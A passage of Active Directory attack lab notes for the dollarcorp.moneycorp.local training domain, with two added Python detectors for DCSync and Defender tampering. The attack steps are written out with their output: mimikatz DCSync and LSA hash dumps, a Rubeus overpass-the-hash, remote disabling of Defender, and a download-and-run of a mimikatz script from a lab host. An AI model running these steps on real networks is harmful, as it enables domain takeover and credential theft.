## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\SafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\SafetyKatz.exe" command of "standard" module not
found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Username AES Hashes


krbtgt 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848

Username NTLM Hashes


krbtgt 4e9815869d2090ccfca61c1fe0d23986
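The DCSync above succeeds because svcadmin, as a Domain Admin, holds the directory replication control-access rights on the domain object; from the DC's point of view it is a replication request coming from a user account rather than from another domain controller. With the Directory Service Access audit subcategory enabled, each such request is logged as Security event 4662 whose Properties field names the replication rights by GUID. The following Python is an added example, not part of the lab notes or of any tool shown here: it scans 4662 records and flags replication rights exercised by anything other than the DC computer accounts (and an optional allowlist for known replication services). The event records are constructed to mimic the fields a SIEM exposes; the GUIDs are the well-known AD schema values.

```python
"""Detect DCSync-style replication requests in Security event 4662 records.

Added example: only domain controllers (and a few known replication services)
should ever exercise the directory replication rights, so any other account
doing so is worth an alert, regardless of how privileged that account is.
"""
import re

# Control-access right GUIDs that DCSync exercises (well-known AD schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Schema class GUID of domainDNS: the object DCSync reads replication data from.
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)

# Constructed sample records shaped like the fields a SIEM exposes for event 4662.
# Account names mirror the lab; the records themselves are not real log data.
SAMPLE_EVENTS = [
    # Normal replication by the DC itself: must not alert.
    {"EventID": 4662, "SubjectDomainName": "dcorp", "SubjectUserName": "DCORP-DC$",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # A user account requesting replication of the domain object: DCSync pattern.
    {"EventID": 4662, "SubjectDomainName": "dcorp", "SubjectUserName": "svcadmin",
     "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Ordinary property read on a user object: no replication right involved.
    {"EventID": 4662, "SubjectDomainName": "dcorp", "SubjectUserName": "student161",
     "ObjectType": "%{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "%%7684 {bf967a7f-0de6-11d0-a285-00aa003049e2}"},
    # Unrelated event id: ignored.
    {"EventID": 4624, "SubjectDomainName": "dcorp", "SubjectUserName": "svcadmin"},
]


def replication_rights(properties):
    """Names of replication rights referenced in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def find_dcsync(events, dc_accounts, allowed_accounts=frozenset()):
    """Return alerts for 4662 events where a non-DC account used replication rights.

    dc_accounts:      computer accounts of legitimate domain controllers, e.g. {"DCORP-DC$"}
    allowed_accounts: service accounts known to replicate (for example a directory sync
                      service account); keep this list short and reviewed.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary object access, not replication
        user = ev["SubjectUserName"]
        if user in dc_accounts or user in allowed_accounts:
            continue  # expected replication partner
        alerts.append({
            "account": f"{ev['SubjectDomainName']}\\{user}",
            "rights": rights,
            # True when the replication request targets the domain head object
            "domain_object": DOMAIN_DNS_CLASS in ev.get("ObjectType", "").lower(),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_EVENTS, {"DCORP-DC$"}):
        print(f"DCSync suspected: {alert['account']} used {', '.join(alert['rights'])}")
```

The allowlist is deliberately by account rather than by group membership: Domain Admins do not replicate during normal operation, so a DA account appearing here is exactly the case the rule is meant to catch. Pair the rule with a review of which principals actually hold the replication rights on the domain object, since removing them from non-DC principals is the preventive control.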

Dumping all hashes from Domain Controller


Using Invoke-Mimi
Dumping all the hashes from the Domain Controller requires Domain Administrator privileges.
Using HFS, we host the script Invoke-MimiEx.ps1 on a web server on our student machine.
Now we execute an Overpass-the-Hash attack with the AES256 hash of the user svcadmin.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True


[*] Username : ARGZ9EJ6
[*] Domain : PW3GFCC2
[*] Password : XEVYM8TW
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4208
[+] LUID : 0x32d375

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)


[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 3330933
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
[*] Target LUID: 0x32d375
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/27/2024 10:19:51 AM
EndTime : 6/27/2024 8:19:51 PM
RenewTill : 7/4/2024 10:19:51 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : jwQnLYt/C4LzMhv3t2lW7UzdnTljUO0+9dA/CyewWTQ=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new Command Prompt with Domain Administrator privileges opens. We will disable Defender and
download the script Invoke-MimiEx.ps1 onto the Domain Controller.
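Each of the four Set-MpPreference calls used in this step changes a Defender registry value, and Defender records every such change as event 5007 ("Windows Defender Antivirus Configuration has changed") in the Microsoft-Windows-Windows Defender/Operational log, including the old and new value. The Python below is an added example, not part of the lab notes: it parses 5007 messages and reports every protection feature that was switched off, distinguishing that from a setting being restored. The event records are constructed to follow the 5007 message layout; the registry paths in them mirror that layout and may differ in detail on a given build, so treat them as illustrative rather than authoritative.

```python
"""Flag Defender protection features being switched off via event 5007.

Added example: parses the "Old value / New value" lines of Defender
configuration-change events and reports features turned off on a host.
"""
import re

# Registry value names whose change to 1 means a protection feature was turned off.
# The names correspond to the Set-MpPreference switches used in the lab.
WATCHED_VALUES = {
    "DisableRealtimeMonitoring": "real-time monitoring",
    "DisableBehaviorMonitoring": "behavior monitoring",
    "DisableIOAVProtection": "download/attachment (IOAV) scanning",
    "DisableIntrusionPreventionSystem": "network intrusion prevention",
}

# Matches "Old value: HKLM\...\Name = 0x1" and "New value: ...". The key path is
# matched lazily so the last path component becomes the value name.
VALUE_RE = re.compile(
    r"(?P<label>Old|New) value:\s*(?P<key>HK[^=\r\n]*?)\\(?P<name>[A-Za-z]+)\s*=\s*"
    r"(?P<data>0x[0-9A-Fa-f]+|\d+)"
)

_HEADER = ("Windows Defender Antivirus Configuration has changed. If this is an unexpected "
           "event you should review the settings as this may be the result of malware.\n")
_RTP = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\"
_DC = "dcorp-dc.dollarcorp.moneycorp.local"


def _event(host, old, new):
    """Build a constructed 5007 record in the shape a log collector would deliver."""
    return {"EventID": 5007, "Computer": host,
            "Message": _HEADER + f"\tOld value: {old}\n\tNew value: {new}"}


# Constructed sample events (not real log data): the four features disabled on the DC,
# one feature restored afterwards, and an unrelated event id.
SAMPLE_EVENTS = [
    _event(_DC, "", _RTP + "DisableRealtimeMonitoring = 0x1"),
    _event(_DC, "", _RTP + "DisableBehaviorMonitoring = 0x1"),
    _event(_DC, "", _RTP + "DisableIntrusionPreventionSystem = 0x1"),
    _event(_DC, "", _RTP + "DisableIOAVProtection = 0x1"),
    _event(_DC, _RTP + "DisableRealtimeMonitoring = 0x1",
           _RTP + "DisableRealtimeMonitoring = 0x0"),
    {"EventID": 1001, "Computer": _DC, "Message": "Scan finished."},
]


def parse_5007(message):
    """Return {'old': (name, int) or None, 'new': (name, int) or None}."""
    change = {"old": None, "new": None}
    for m in VALUE_RE.finditer(message):
        change[m.group("label").lower()] = (m.group("name"), int(m.group("data"), 0))
    return change


def find_protection_disabled(events):
    """Alerts for 5007 events whose new value turns a watched feature off."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 5007:
            continue
        new = parse_5007(ev.get("Message", ""))["new"]
        if new and new[0] in WATCHED_VALUES and new[1] == 1:
            alerts.append({"host": ev.get("Computer"), "setting": new[0],
                           "feature": WATCHED_VALUES[new[0]]})
    return alerts


def find_protection_restored(events):
    """Settings flipped back from 1 to 0, useful to pair with the alerts above."""
    restored = []
    for ev in events:
        if ev.get("EventID") != 5007:
            continue
        change = parse_5007(ev.get("Message", ""))
        old, new = change["old"], change["new"]
        if old and new and old[0] == new[0] and old[1] == 1 and new[1] == 0:
            restored.append((ev.get("Computer"), new[0]))
    return restored


if __name__ == "__main__":
    for a in find_protection_disabled(SAMPLE_EVENTS):
        print(f"{a['host']}: {a['feature']} disabled ({a['setting']})")
```

Four such events within seconds of each other on a domain controller are a strong signal on their own. The preventive control is Defender Tamper Protection, which rejects Set-MpPreference changes to these settings even from an administrator; where it is on, the lab step fails rather than silently succeeding.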
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements!


https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { Set-MpPreference -DisableRealtimeMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { Set-MpPreference -DisableBehaviorMonitoring $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { Set-MpPreference -DisableIntrusionPreventionSystem $true }
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -ScriptBlock { Set-MpPreference -DisableIOAVProtection $true }
PS C:\Windows\system32> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> iex (iwr -UseBasicParsing http://172.16.100.163/Invoke-MimiEx.ps1)
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command '"lsadump::lsa /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch


Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)


User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)


User : Guest
LM :
NTLM :

RID : 000001f6 (502)


User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID : 00000459 (1113)


User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)


User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)


User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)


User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7
RID : 0000045e (1118)
User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)


User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)


User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)


User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)


User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID : 00001055 (4181)


User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)


User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)


User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9

RID : 00003523 (13603)


User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)


User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)


User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)


User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)


User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)


User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)


User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)


User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)


User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d

RID : 0000352c (13612)


User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)


User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)


User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3

RID : 0000352f (13615)


User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)


User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)


User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)


User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)


User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)


User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)


User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)


User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)


User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)


User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)


User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)


User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353b (13627)


User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)


User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)


User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)


User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)


User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)


User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)


User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)


User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)


User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)


User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)


User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)


User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)


User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)


User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)


User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 0000354a (13642)
User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)


User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)


User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)


User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)


User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)


User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)


User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)


User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003552 (13650)


User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)


User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)


User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)


User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7
RID : 00003556 (13654)
User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)


User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003558 (13656)


User : Support176user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003559 (13657)


User : Support177user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355a (13658)


User : Support178user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355b (13659)


User : Support179user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355c (13660)


User : Support180user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000355d (13661)


User : VPN161user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355e (13662)


User : VPN162user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000355f (13663)


User : VPN163user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003560 (13664)


User : VPN164user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003561 (13665)


User : VPN165user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003562 (13666)


User : VPN166user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003563 (13667)


User : VPN167user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003564 (13668)


User : VPN168user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003565 (13669)


User : VPN169user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003566 (13670)


User : VPN170user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003567 (13671)


User : VPN171user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003568 (13672)


User : VPN172user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 00003569 (13673)


User : VPN173user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356a (13674)


User : VPN174user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356b (13675)


User : VPN175user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356c (13676)


User : VPN176user
LM :
NTLM : bb1d7a9ac6d4f535e1986ddbc5428881

RID : 0000356d (13677)


User : VPN177user
LM :
